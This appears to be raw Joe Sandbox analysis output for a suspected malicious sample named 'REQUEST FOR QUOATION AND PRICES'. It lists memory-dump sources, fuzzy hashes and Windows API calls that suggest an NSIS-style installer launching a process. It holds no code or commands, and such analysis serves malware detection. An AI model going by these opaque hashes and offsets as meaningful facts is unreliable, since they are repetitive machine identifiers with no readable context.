                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: nsa
                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405678
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9